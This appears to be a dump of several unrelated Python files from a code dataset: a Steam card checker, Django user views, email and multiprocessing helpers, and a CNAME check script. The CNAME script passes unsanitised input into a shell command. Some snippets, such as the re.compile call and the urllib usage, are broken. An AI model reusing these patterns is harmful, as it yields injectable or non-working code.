int(data[\"searchInformation\"][\"totalResults\"])\n if total_results < 1 or len(data[\"items\"]) < 1:\n logging.error(\"No results found for %s\", name)\n return None\n\n\n except (json.decoder.JSONDecodeError, KeyError, ValueError):\n logging.exception(\"Failed to parse google's response for %s\", name)\n return None\n top_result = data[\"items\"][0][\"title\"]\n top_link = data[\"items\"][0][\"link\"]\n\n app_id = top_link[top_link.index(\"/app/\") + len(\"/app/\"):]\n app_id = app_id[:app_id.index(\"/\")]\n return app_id\n\n def fetch_card_info(self):\n \"\"\"Use Steam's web api to find out whatever the app has cards.\"\"\"\n accessed_net = False\n\n if self.card_status_known:\n logging.info(\"Card status for %s is already known. %s. Skipping fetch.\", self.users_name, self.has_cards)\n return accessed_net\n if self.id is None:\n logging.warning(\"Unknown app_id: Skipping data fetch for %s.\", self.users_name)\n return accessed_net\n logging.info(\"Fetching card data for app %s (%s).\", self.id, self.users_name)\n data = Game.__app_details_steam_api__(self.id)\n accessed_net = True\n if data is None:\n logging.error(\"Fetching Failed! app %s (%s).\", self.id, self.users_name)\n return accessed_net\n\n self.card_status_known = True\n for tag in data[\"categories\"]:\n if tag[\"id\"] == 29: # and tag[\"description\"] == \"Steam Trading Cards\":\n self.has_cards = True\n logging.info(\"Card status for %s is found. %s\", self.users_name, self.has_cards)\n return accessed_net\n\n @staticmethod\n def __app_details_steam_api__(app_id, timeout_time=20):\n \"\"\"Use Steam's web api and fetch details about the app whose ID is app_id\"\"\"\n req = urllib.request.Request(\"http://store.steampowered.com/api/appdetails/?appids=\" + app_id)\n try:\n with urllib.request.urlopen(req, timeout=timeout_time) as f:\n json_bytes = f.read()\n\n except timeout:\n logging.error(\"Timeout while getting details for %s. \\n\\t\\t%s\", app_id, req.get_full_url())\n return None\n except urllib.error.HTTPError:\n logging.exception(\"Failed getting details for app number %s\", app_id)\n return None\n json_text = json_bytes.decode(\"utf-8\")\n try:\n game_info = json.loads(json_text)\n if not game_info[app_id][\"success\"]:\n return None\n\n data = game_info[app_id][\"data\"]\n return data\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse details for app number %s\", app_id)\n return None\n\n\nclass AppList:\n \"\"\"Describe a list of appIDs and app names. Used to find the name of the app based on the id.\"\"\"\n FETCH_URL = \"http://api.steampowered.com/ISteamApps/GetAppList/v0001/\"\n FETCH_LOCAL_PATH = \"Applist.txt\"\n\n def __init__(self):\n self.__data__ = None\n self.id_lookup = None\n self.name_lookup = None\n self.simplified_names = None\n\n @staticmethod\n def fetch_from_net(url=FETCH_URL):\n \"\"\"Fetch new AppList from the web. See: http://api.steampowered.com/ISteamApps/GetAppList/v0001/ \"\"\"\n req = urllib.request.Request(url)\n try:\n with urllib.request.urlopen(req) as f:\n json_bytes = f.read()\n except urllib.error.HTTPError:\n logging.exception(\"Failed to fetch applist from net\")\n return None\n\n return json_bytes.decode(\"utf-8\")\n\n @staticmethod\n def fetch_from_disk(path=FETCH_LOCAL_PATH):\n \"\"\"Fetch AppList from the disk where it was previously saved.\"\"\"\n with open(path, encoding='UTF-8') as file:\n return file.read()\n\n @staticmethod\n def write_apps_to_disk(data, path=FETCH_LOCAL_PATH):\n \"\"\"Write ApplList to the disk. Probably because a new one was fetched from the internet.\"\"\"\n with open(path, \"w\", encoding='UTF-8') as file:\n file.write(data)\n\n @staticmethod\n def json_to_list(json_text):\n \"\"\"Parse the json data and turn it into a list of id-name pairs\"\"\"\n try:\n game_info = json.loads(json_text)\n return game_info[\"applist\"][\"apps\"][\"app\"]\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse fetched applist\")\n return None\n\n def fetch(self, always_fetch_from_net=False):\n \"\"\"Fill the object with data about app names. get the data either from a local file or from the internet. Automatically access the net if the file is missing.\"\"\"\n if self.__data__ is not None:\n return self\n\n if always_fetch_from_net or not os.path.exists(AppList.FETCH_LOCAL_PATH):\n json_text = AppList.fetch_from_net()\n self.__data__ = AppList.json_to_list(json_text)\n AppList.write_apps_to_disk(json_text)\n else:\n self.__data__ = AppList.json_to_list(AppList.fetch_from_disk())\n\n # Lookup appid->name\n self.id_lookup = {pair[\"appid\"]: pair[\"name\"] for pair in self.__data__}\n\n # Lookup name->appid. It is possible that there are multiple games with the same name. Remove all of them. Handle it latter in the code.\n self.simplified_names = [simplified_name(pair[\"name\"]) for pair in self.__data__]\n id_strings = [str(pair[\"appid\"]) for pair in self.__data__]\n\n self.name_lookup = {name: appid for (name, appid) in zip(self.simplified_names, id_strings)}\n return self\n\n def contains_duplicates(self, name):\n return self.simplified_names.count(name) > 1\n\n\ndef simplified_name(name):\n \"\"\"Takes a name and transforms it into simpler form that will be used as dict key. Used to make sure that even if the user wrote non-exact name the program will still recognize it.\n For example transforms \"Brütal Legend\" into \"Brutal Legend\". Whatever spelling the user used in his list, both will be mapped to the same key.\n \"\"\"\n ret = name.strip()\n ret = ret.lower()\n\n translation_table = dict.fromkeys(map(ord, \"™®©!,.'’`[](){}\\\"\"), None)\n translation_table.update(dict.fromkeys(map(ord, \"_-:;\"), \" \"))\n translation_table[ord(\"&\")] = \"and\"\n translation_table[ord(\"á\")] = \"a\"\n translation_table[ord(\"é\")] = \"e\"\n translation_table[ord(\"í\")] = \"i\"\n translation_table[ord(\"ó\")] = \"o\"\n translation_table[ord(\"ö\")] = \"o\"\n translation_table[ord(\"ú\")] = \"u\"\n translation_table[ord(\"ü\")] = \"u\"\n translation_table[ord(\"fi\")] = \"fi\"\n\n ret = ret.translate(translation_table)\n ret = \" \".join(ret.split())\n return ret\n\n\nclass Exporter:\n def __init__(self, *args):\n self.exporter_list = list(args)\n\n\n def add_output(self, exporter):\n self.exporter_list.append(exporter)\n\n\n def write(self, game):\n for e in self.exporter_list:\n e.write(game.users_name, game.id, game.card_status_known, game.has_cards)\n\n def close(self):\n for e in self.exporter_list:\n if callable(getattr(e, \"close\", None)):\n e.close()\n\n def flush(self):\n for e in self.exporter_list:\n if callable(getattr(e, \"flush\", None)):\n e.flush()\n\n class CSVFile:\n\n def __init__(self, filename):\n self.file = open(filename, mode=\"w\", encoding='UTF-8', newline='')\n self.file_writer = csv.writer(self.file)\n\n def close(self):\n self.file.close()\n\n def flush(self):\n \"\"\"Source: https://stackoverflow.com/a/19756479/2842452\"\"\"\n self.file.truncate()\n self.file.seek(0, 0)\n self.file.flush()\n os.fsync(self.file.fileno())\n\n\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"\"\n status = \"\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n self.file_writer.writerow([name, appid, status])\n\n class Log:\n\n def __init__(self, level=logging.INFO):\n self.level = level\n\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"?\"\n status = \"?\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n logging.log(self.level, \"%s (%s): [%s]\", name, appid, status)\n\n class TextBox:\n\n def __init__(self, box, index):\n self.box = box\n self.index = index\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"?\"\n status = \"?\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n self.box.insert(self.index, \"%s (%s): [%s]\\n\" % (name, appid, status))\n\n\n\nclass Delayer:\n def __init__(self, long_sleep_count=50, short_sleep_time=1.5, long_sleep_time=15):\n self.count = long_sleep_count\n self.i = long_sleep_count\n self.short = short_sleep_time\n self.long = long_sleep_time\n\n def tick(self):\n time.sleep(self.short)\n self.i -= 1\n if self.i <= 0:\n self.i = self.count\n logging.info(\"Accessed the internet %d times. Taking a short break to avoid overwhelming APIs.\", self.count)\n time.sleep(self.long)\n\n\ndef init_log(filename=None, console=False, level=logging.WARNING):\n logger = logging.getLogger()\n\n if filename is not None:\n handler = logging.FileHandler(filename, encoding=\"utf-8\", mode='w')\n handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s:%(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\"))\n logger.addHandler(handler)\n\n if console: # False or None means no output. True means syso output. Instance of stream means output to the stream.\n stream = syso if console is True else console\n handler = logging.StreamHandler(stream)\n logger.addHandler(handler)\n\n logger.setLevel(level)\n\n\ndef string_represent_int(s):\n \"\"\"Source: https://stackoverflow.com/a/1267145/2842452\"\"\"\n try:\n int(s)\n return True\n\n except ValueError:\n return False\n\n\ndef load_config_file(path):\n with open(path, encoding='UTF-8') as file:\n config = json.loads(file.read())\n if config[\"key\"] == \"YOUR_KEY_HERE\":\n config[\"key\"] = None\n logging.warning(\"No Google API key is set. Using google search is impossible.\")\n\n return config\n\n\ndef users_game_gen(path):\n \"\"\"Reads the file located in path and creates a Game object for each game written there. One game name per line.\"\"\"\n\n with open(path, encoding='UTF-8', newline=\"\") as file:\n file_reader = csv.reader(file)\n for row in file_reader:\n if len(row) == 0:\n continue\n\n if len(row) >= 3 and string_represent_int(row[-2]) and row[-1].upper() in [\"TRUE\", \"FALSE\", \"\"]:\n \"\"\"The line scanned is in the same format as the output of our program\"\"\"\n name = \"\".join(row[:-2])\n game = Game(name)\n game.id = row[-2]\n game.card_status_known = row[-1] != \"\"\n game.has_cards = game.card_status_known and row[-1].upper() == \"TRUE\"\n else:\n \"\"\"The line wasn't written by us. Assuming it is all one long name\"\"\"\n name = \"\".join(row)\n game = Game(name)\n yield game\n\n\ndef users_game_list(path):\n return list(users_game_gen(path))\n\n\ndef main():\n path_in = \"Test/big_list.txt\"\n path_out = \"Test/big_list_out.csv\"\n\n init_log(filename=\"log.txt\", console=True, level=logging.DEBUG)\n logging.info(\"Loading configuration file\")\n config = load_config_file(\"./config.txt\")\n logging.info(\"Loading AppList\")\n app_list = AppList().fetch()\n logging.info(\"Creating timer\")\n sleep = Delayer(50, 1.5, 15)\n logging.info(\"Creating an exporter\")\n with closing(Exporter(Exporter.CSVFile(path_out), Exporter.Log())) as export:\n\n for game in users_game_gen(path_in):\n err = False\n logging.info(\"Processing: %s\", game.users_name)\n accessed_net = game.find_id(app_list, config)\n if game.id is None:\n logging.error(\"Couldn't find ID for %s\", game.users_name)\n err = True\n\n if not err:\n accessed_net = game.fetch_card_info() or accessed_net # Order is important here. You don't want to short-circuit the fetch.\n if not game.card_status_known:\n logging.error(\"Couldn't find cards status for %s\", game.users_name)\n err = True\n\n if not err:\n export.write(game)\n\n if accessed_net: # We go to sleep if we gone online. Regardless of \"err\" and our success with fetching the cards.\n sleep.tick()\n\n logging.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Release/v1.0/python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"54260995","text":"from GCF.DB.PriceInfoDao import PriceInfoDao\nfrom GCF.DB.UpDownCountDao import UpDownCountDao\nfrom GCF.strategy.NearMAStrategy import NearMAStrategy\n\n\nclass FutureResult:\n def __init__(self):\n self.code = None\n self.start_date = None\n self.future_days = None\n self.percent = None\n self.is_up = None\n\n def __str__(self):\n return self.code + ', ' + self.start_date + ', ' + str(self.future_days) + '天内 ' + str(self.percent)\n\n\nclass StatisticWinRateOf60MA:\n def __init__(self):\n self.upDownCountDao = UpDownCountDao('../DB/consider.db')\n self.priceInfoDao = PriceInfoDao('../DB/winner.db')\n self.nearMAStrategy = NearMAStrategy()\n\n def check_up_percent(self, priceInfos, index, in_days):\n if len(priceInfos) < index:\n return False\n price_near_60ma = priceInfos[index]\n price_future = priceInfos[index - in_days]\n diff = price_future.price - price_near_60ma.price\n diff_percent = diff / price_near_60ma.price\n return diff_percent\n\n # single code history win rate\n def get_win_rate_of_one_code(self, code, in_days):\n priceInfos = self.priceInfoDao.get_records_by_code(code)\n if len(priceInfos) < 60:\n print('天数少于60,跳过...')\n return None\n futureResults = []\n futureResultsFiltered = []\n for i in range(in_days, len(priceInfos) - 60): # 统计历史,当前这几天就算了\n is_near = self.nearMAStrategy.do_specific_day(priceInfos, i)\n if is_near:\n percent = self.check_up_percent(priceInfos, i, in_days)\n futureResult = FutureResult()\n futureResult.code = code\n futureResult.future_days = in_days\n futureResult.percent = str(round(percent * 100, 2)) + '%'\n futureResult.start_date = priceInfos[i].date\n\n is_ma60_up = self.nearMAStrategy.check_ma_up(priceInfos, i, 6, 60)\n is_ma60_under_ma5_current = self.nearMAStrategy.check_under_ma5(priceInfos, i, 60) # 当天的MA5\n\n # 5天前的MA5,这样是为了确保有些误差。有些时候从下面拱上来,也会超过MA60并且是方向朝上。\n is_ma60_under_ma5_before5 = self.nearMAStrategy.check_under_ma5(priceInfos, i+30, 60)\n futureResults.append(futureResult)\n if is_ma60_up and is_ma60_under_ma5_current and is_ma60_under_ma5_before5:\n futureResultsFiltered.append(futureResult)\n\n\n\n print('\\n\\n筛选后的结果:')\n print(len(futureResults))\n for futureResult in futureResults:\n print(futureResult)\n\n print('\\n\\n-----------过滤60MA朝上的结果:-----------')\n print(len(futureResultsFiltered))\n for futureResult in futureResultsFiltered:\n print(futureResult)\n return futureResults\n\n def get_win_rate_of_all(self):\n return\n\n\nif __name__ == '__main__':\n statistic = StatisticWinRateOf60MA()\n # statistic.get_win_rate_of_one_code('000001', 3)\n statistic.get_win_rate_of_one_code('000710', 3)\n","sub_path":"GCF/consider/StatisticWinRateOf60MA.py","file_name":"StatisticWinRateOf60MA.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"76355843","text":"import setuptools\n\nNAME = \"flask_kafka_logger\"\n\nsetuptools.setup(\n name=NAME,\n packages=setuptools.find_packages(exclude=['t', 't.*']),\n version=\"0.1\",\n description=\"flask kafka logger extension\",\n author=\"jian.fu\",\n author_email=\"jian.fu@17zuoye.com\",\n license='BSD',\n platforms=['any'],\n install_requires=[\"kafka-python\", \"python-json-logger\"],\n include_package_data=True,\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"440604086","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView, DetailView\n\nfrom account.forms import SignUpForm\nfrom account.models import Profile\n\n\nclass IndexView(ListView):\n template_name = 'home_data_user.html'\n context_object_name = 'data_list'\n\n def get_queryset(self):\n\n db = Profile.objects.all()\n\n data_list = []\n\n status = {\n '1': 'Admin',\n '2': 'Staff'\n }\n\n for x in db:\n data = {\n 'pk': int(x.pk),\n 'username': x.username,\n 'first_name': x.first_name,\n 'last_name': x.last_name,\n 'email': x.email,\n 'status': status.get(x.status)\n }\n data_list.append(data)\n\n context = {\n 'dt': data_list\n }\n\n return context\n\n\nclass DataDetailView(DetailView):\n model = Profile\n template_name = 'home_data_user_detail.html'\n\n\ndef detail(request, pk, template_name='home_data_user_detail.html'):\n db = get_object_or_404(Profile, pk=pk)\n\n if db is not None:\n status = {\n '1': 'Admin',\n '2': 'Staff'\n }\n profile = {\n 'username': db.username,\n 'first_name': db.first_name,\n 'last_name': db.last_name,\n 'email': db.email,\n 'status': status.get(db.status)\n }\n else:\n profile = {\n 'username': '-',\n 'first_name': '-',\n 'last_name': '-',\n 'email': '-',\n 'status': '-'\n }\n\n context = {\n 'profile': profile\n }\n\n return render(request, template_name, context)\n\n\ndef create(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n\n if form.is_valid():\n if form.cleaned_data.get('password1') == form.cleaned_data.get('password2'):\n user = form.save()\n user.refresh_from_db()\n user.profile.username = form.cleaned_data.get('username')\n user.profile.first_name = form.cleaned_data.get('first_name')\n user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = form.cleaned_data.get('email')\n\n if form.cleaned_data.get('is_staff'):\n user.profile.status = '1'\n else:\n user.profile.status = '2'\n\n user.save()\n\n return redirect('home:data-user')\n\n form = SignUpForm()\n return render(request, 'home_data_user_create.html', {'form': form})\n\n\ndef edit(request, pk, template_name='home_data_user_edit.html'):\n data = get_object_or_404(User, pk=pk)\n form = SignUpForm(request.POST or None, instance=data)\n\n if form.is_valid():\n if form.cleaned_data.get('password1') == form.cleaned_data.get('password2'):\n user = form.save()\n user.refresh_from_db()\n user.profile.username = form.cleaned_data.get('username')\n user.profile.first_name = form.cleaned_data.get('first_name')\n user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = form.cleaned_data.get('email')\n\n if form.cleaned_data.get('is_staff'):\n user.profile.status = '1'\n else:\n user.profile.status = '2'\n\n user.save()\n\n return redirect('home:data-user')\n\n return render(request, template_name, {'form': form})\n\n\ndef delete(request, pk, template_name='confirm_delete.html'):\n contact = get_object_or_404(Profile, pk=pk)\n if request.method == 'POST':\n contact.delete()\n return redirect('home:data-user')\n return render(request, template_name, {'object': contact})\n\n","sub_path":"home/views/view_data_user.py","file_name":"view_data_user.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291153257","text":"import matplotlib.pyplot as plt\r\n# Part 1\r\nimport csv\r\n\r\nx=[]\r\ny=[]\r\nwith open('example.txt','r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter = ',')\r\n for row in plots:\r\n x.append(int(row[0]))\r\n y.append(int(row[1]))\r\nplt.plot(x,y,label = 'Loaded from file!') \r\n\r\n# Part 2\r\nimport numpy as np\r\nx,y = np.loadtxt('example.txt',delimiter = ',',unpack = True)\r\nplt.plot(x,y,label = 'Loaded from file!') \r\n\r\n# part 3 Getting data from internet\r\n\r\nstock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement'\r\nsource_code = urllib.request.urlopen(stock_price_url).read\r\n\r\n\r\nplt.xlabel('x')\r\nplt.ylabel('y')\r\nplt.title('Scatter Plot demonstration')\r\nplt.legend()\r\nplt.show()","sub_path":"plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"77883176","text":"import logging\nimport threading\nfrom logging.handlers import RotatingFileHandler\n\nfrom wechatManager.config import BaseConfig, configs\n\n\nCONFIG = BaseConfig\nfrom wechatManager import core\n\ndef setup_log(CONFIG):\n \"\"\"配置日志\"\"\"\n\n # 设置日志的记录等级\n logging.basicConfig(level=CONFIG.LOG_LEVEL) # 调试debug级\n # 创建日志记录器,指明日志保存的路径、每个日志文件的最大大小、保存的日志文件个数上限\n file_log_handler = RotatingFileHandler(\"logs/log\", maxBytes=1024 * 1024 * 100, backupCount=10)\n # 创建日志记录的格式 日志等级 输入日志信息的文件名 行数 日志信息\n formatter = logging.Formatter('%(levelname)s %(filename)s:%(lineno)d %(message)s')\n # 为刚创建的日志记录器设置日志记录格式\n file_log_handler.setFormatter(formatter)\n # 为全局的日志工具对象(flask app使用的)添加日志记录器\n logging.getLogger().addHandler(file_log_handler)\n\n\n\ndef start_manage(config_name):\n global CONFIG\n CONFIG = configs[config_name]\n\n setup_log(CONFIG)\n while True: # 主循环\n try:\n dictKeys = core.onlineDict.keys()\n for userName in dictKeys:\n user = core.onlineDict[userName]\n if user.loading:\n if user.alive:\n if user.receiveMsg:\n threading.Thread(target=user.run).start()\n user.receiveMsg = False\n else:\n threading.Thread(target=user.login).start()\n user.alive = True\n else:\n if user.online:\n user.logout()\n except RuntimeError as reason:\n print('index Error:', reason)\n\n\ndef create_admin(adminName):\n core.onlineDict[adminName] = core.User(adminName)\n core.onlineDict[adminName].cmdQR = CONFIG.CMDQR\n core.onlineDict[adminName].autoLogin = True\n core.onlineDict[adminName].loading = True","sub_path":"wechatManager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306745698","text":"import re\nimport os\nimport smtplib\nfrom email.MIMEMultipart import MIMEMultipart \nfrom email.MIMEBase import MIMEBase \nfrom email.MIMEText import MIMEText \nfrom email.Utils import COMMASPACE, formatdate \nfrom email import Encoders \n\nSMTP_MAIL_FROM = \"\"\nSMTP_MAIL_SERVER = \"\"\n\n\ndef is_valid_email(email):\n return re.match(\"^.+\\\\@(\\\\[?)[a-zA-Z0-9\\\\-\\\\.]+\\\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\\\]?)$\", email) != None\n\ndef send_mail(to, subject, text, frm=SMTP_MAIL_FROM, is_html=False,\n files=[], cc=[], bcc=[]): \n assert type(to)==list \n assert type(files)==list \n assert type(cc)==list \n assert type(bcc)==list \n \n message = MIMEMultipart() \n message['From'] = frm \n message['To'] = COMMASPACE.join(to) \n message['Date'] = formatdate(localtime=True) \n message['Subject'] = subject \n message['Cc'] = COMMASPACE.join(cc) \n message.set_charset('UTF-8')\n\n \n if is_html:\n message.attach(MIMEText(text,'html'))\n else:\n message.attach(MIMEText(text,'plain'))\n \n for f in files: \n part = MIMEBase('application', 'octet-stream') \n part.set_payload(open(f, 'rb').read()) \n Encoders.encode_base64(part) \n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(f)) \n message.attach(part) \n \n addresses = [] \n for x in to: \n addresses.append(x) \n for x in cc: \n addresses.append(x) \n for x in bcc: \n addresses.append(x) \n \n smtp = smtplib.SMTP(SMTP_MAIL_SERVER) \n smtp.sendmail(frm, addresses, message.as_string()) \n smtp.close()","sub_path":"nels-storage-commandlines/utils/mail_utils.py","file_name":"mail_utils.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122551728","text":"# -*- coding:utf-8 -*-\n# @Desc : \n# @Author : Administrator\n\n## 什么是程序: 例如xxx.py这是程序,是一个静态的\n## 什么是进程: 正在运行的应用程序就是一个进程;进程是资源分配的基本单元\n\n## 进程的状态:\n# 工作中,任务数往往大于CPU的核数,即一定有一些任务正在执行,而另外一些任务在等待CPU进行执行,因此导致了有了不同的状态\n# 就绪态: 运行的条件都已经满足,正在等待CPU执行\n# 执行态: CPU正在执行其功能\n# 等待态: 等待某些条件满足,例如一个程序sleep了,此时就处于等待态\n\n\n## 创建进程对象: multiprocessing.Process()\n# 参数说明:\n# target 如果传递了函数的引用,子进程就执行这里面的内容\n# name 进程设定名称,默认为Process-N,N为从1开始递增的整数\n# args 元组,给target指定的函数传递的参数,以元组的方式传递\n# kwargs 字典,给target指定的函数传递的参数,以关键字方式传递\n\n## multiprocessing.Process进程类提供了哪些属性:\n# pid: 当前进程的pid(进程号)\n\n## multiprocessing.Process进程类提供了哪些方法:\n# start(): 启动子进程实例(创建子进程)\n# is_alive(): 判断进程子进程是否还在活着\n# join([timeout]): 是否等待子进程执行结束,或等待多少秒\n# terminate(): 不管任务是否完成,立即终止子进程\n\n## 线程与进程的区别:\n# 进程: 能够完成多任务,如: 一台电脑上能够同时运行多个多个QQ\n# 线程: 能够完成多任务,如: 一个QQ中得多个聊天窗口\n\n\n##############################################################################################\n\nimport multiprocessing\nimport time\n\ndef test1():\n \"\"\" 子进程要执行的代码 \"\"\"\n while True:\n print(\" --- test1 --- \")\n time.sleep(1)\n\ndef test2():\n \"\"\" 子进程要执行的代码 \"\"\"\n while True:\n print(\" --- test2 --- \")\n time.sleep(1)\n\n# def main():\n#\n# p1 = multiprocessing.Process(target=test1)\n# p2 = multiprocessing.Process(target=test2)\n# p1.start()\n# p2.start()\n\n\n#############################################################################################\n\n## 通过队列完成多进程之间通信\n\ndef download_from_web(q):\n \"\"\" 下载数据 \"\"\"\n # 模拟从网上下载数据\n data = [11,22,33,44,55]\n # 向队列中写数据\n for temp in data:\n q.put(temp)\n print(\"下载器已经下载完了数据,并已存入队列中...\")\n\ndef analysis_data(q):\n \"\"\" 数据处理 \"\"\"\n waitting_analysis_data = list()\n # 从队列中取数据\n while True:\n data = q.get()\n waitting_analysis_data.append(data)\n if q.empty(): # 如果队列为空,退出循环\n break\n print(waitting_analysis_data)\n\n# def main():\n# # 创建一个队列\n# q = multiprocessing.Queue()\n#\n# # 创建多个进程,将队列的引用当做实参进行传递到里面\n# p1 = multiprocessing.Process(target=download_from_web, args=(q,))\n# p2 = multiprocessing.Process(target=analysis_data, args=(q,))\n# p1.start()\n# p2.start()\n\n\n#############################################################################################\n\n## 进程池: 可以指定最大进程数\n\n# from multiprocessing import Pool\nimport random, os\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执行,进程号为%d\" %(msg, os.getpid()))\n # random.random() 随机生成0~1之间的浮点数\n time.sleep(random.random()*2)\n t_stop = time.time()\n print(msg,\"执行完毕,耗时%0.2f\" % (t_stop - t_start))\n\npool = multiprocessing.Pool(3) # 定义一个进程池,最大进程数3\nfor i in range(10):\n # Pool.apply_async(要调用的目标函数,(传递给目标函数的参数元组,))\n # 每次循环将会用空闲出来的子进程去调用目标\n pool.apply_async(worker, args=(i,))\n\nprint(\" --- 开始 --- \")\npool.close() # 关闭进程池,关闭后po不在接受新的请求\npool.join() # 等待po中所有子进程执行完成,必须放在close语句之后\nprint(\" --- 结束 --- \")\n\n\n\nif __name__ == '__main__':\n # main()\n pass\n\n\n","sub_path":"[05]Python-线程与队列部分/02多任务-进程(multiprocessing)的总结.py","file_name":"02多任务-进程(multiprocessing)的总结.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417784032","text":"import json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom const import (\n SAMPLE_DATA_DIR,\n ES_HOST,\n ES_PORT\n)\n\nes = Elasticsearch(host= ES_HOST, port= ES_PORT)\nes = Elasticsearch()\n\ndef load_jsondata():\n with open(SAMPLE_DATA_DIR) as f:\n return json.load(f)\n#yığıt halinde veri yükleme işlemi\ndef insert_data_by_bulk(data):\n res = helpers.bulk(es, data)\n print(res)\n\n\nif __name__ == \"__main__\":\n demo_data_2 = load_jsondata()\n insert_data_by_bulk(demo_data_2)\n","sub_path":"compose_env/es_insert_bulk.py","file_name":"es_insert_bulk.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199183198","text":"#!/opt/hopeservice/.venv/bin/python\n# -*- coding: UTF-8 -*-\n# @Time : 27/02/2018 10:00\n# @Author : yao.liu\n# @File : cname_detect.py\n# version : 1.0\n\nimport commands\nimport sys\nimport requests\nimport re\nfrom datetime import datetime\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\ndef cname_check(domain):\n '''dig测试域名'''\n cmd = ' dig @8.8.8.8 {0} '.format(domain)\n res = commands.getoutput(cmd)\n match = re.compile('ccgslb|chinacache',res)\n if match:\n return True\n else:\n return None\n\ndef sendmail(content):\n '''发送告警邮件'''\n #填写收件人\n data = {'tos': 'yao.liu@chinacache.com',\n 'subject': '[devops] cname_detect -域名已切回蓝汛加速',\n 'content': '{}'.format(content)}\n res = requests.post('http://223.202.201.32:8700/email', data=data)\n\nif __name__ == '__main__':\n time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n domain_file = sys.argv[1]\n with open(domain_file,'r') as fn:\n for i in fn.readlines():\n if cname_check(i):\n content = '''您好【{0}】: \\\n
域名切回至蓝汛服务
{1}'''.format(time_now,i)\n sendmail(content)\n\n","sub_path":"61run2.py","file_name":"61run2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532188869","text":"from sqlalchemy import create_engine\nengine = create_engine('sqlite:///census.sqlite')\n\n# Create a connection on engine\nconnection = engine.connect()\n\n# Build select statement for census table: stmt\nstmt = 'SELECT * from census'\n\n# Execute the statement and fetch the results: results\nresults = connection.execute(stmt).fetchall()\n\n# Print results\nprint(results)\n\n\n\n# Import select\nfrom sqlalchemy import select\n\n# Reflect census table via engine: census\ncensus = Table('census', metadata, autoload=True, autoload_with=engine)\n\n# Build select statement for census table: stmt\nstmt = select([census])\n\n# Print the emitted statement to see the SQL string\nprint(stmt)\n\n# Execute the statement on connection and fetch 10 records: result\nresults = connection.execute(stmt).fetchmany(size=10)\n\n# Execute the statement and print the results\nprint(results)\n\n","sub_path":".history/mysql/script_01_20201119132146.py","file_name":"script_01_20201119132146.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290290756","text":"## Automatically adapted for numpy.oldnumeric Oct 04, 2007 by \n\n\"\"\"\nData Distance\nComputes a distance matrix between data files.\nicons/ChipDistance.png\n1160\nPeter Juvan (peter.juvan@fri.uni-lj.si)\n\"\"\"\n\nimport numpy.oldnumeric as Numeric, numpy.oldnumeric.ma as MA\nimport statc\nimport orange, OWGUI\nfrom qt import *\nfrom qtcanvas import *\nfrom OWWidget import *\nfrom OWDataFiles import DataFiles\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", \"'strain'\", orange.AttributeWarning)\nwarnings.filterwarnings(\"ignore\", \"'dirname'\", orange.AttributeWarning)\n\n##############################################################################\n# main class\n\nclass OWDataDistance(OWWidget):\n settingsList = [\"Metrics\"]\n\n def __init__(self, parent=None, signalManager = None):\n OWWidget.__init__(self, parent, signalManager, 'Data Distance') \n \n self.inputs = [(\"Structured Data\", DataFiles, self.chipdata)]\n self.outputs = [(\"Distance Matrix\", orange.SymMatrix)]\n\n self.Metrics = 0\n self.loadSettings()\n self.data = []\n## self.metrics = [(\"Euclidean\", orange.ExamplesDistanceConstructor_Euclidean),\n## 